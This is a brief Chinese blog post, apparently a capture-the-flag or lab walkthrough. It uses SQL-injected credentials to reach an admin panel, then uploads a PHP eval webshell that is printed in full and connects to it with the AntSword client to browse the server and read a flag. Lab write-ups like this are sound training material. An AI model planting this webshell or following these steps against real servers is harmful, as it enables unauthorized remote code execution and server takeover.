您的位置: 首页 > 文章 > 获取服务器目录 获取服务器目录 分类: 文章 • 2024-07-18 15:52:16 一、进入后台(靶机测试) 通过sql注入得到的账号与密码进入后台 二、上传文件 1、找到后台内上传文件位置上传一个webshell.php文件其中包含 <?php @eval($_POST['shell']);?> 2、找到网站前台页面点击文件 选择你所上传文件点击下载从下载页面获取文件网址 三、通过蚁剑获取服务器目录 1、打开蚁剑点击右键选择添加数据 2、将获得的文件网址放进第一行密码填入shell 3、点击保存 双击网址即可进入服务器目录 四、寻找flag 进入根目录点击flag文件 完成
选择你所上传文件点击下载从下载页面获取文件网址
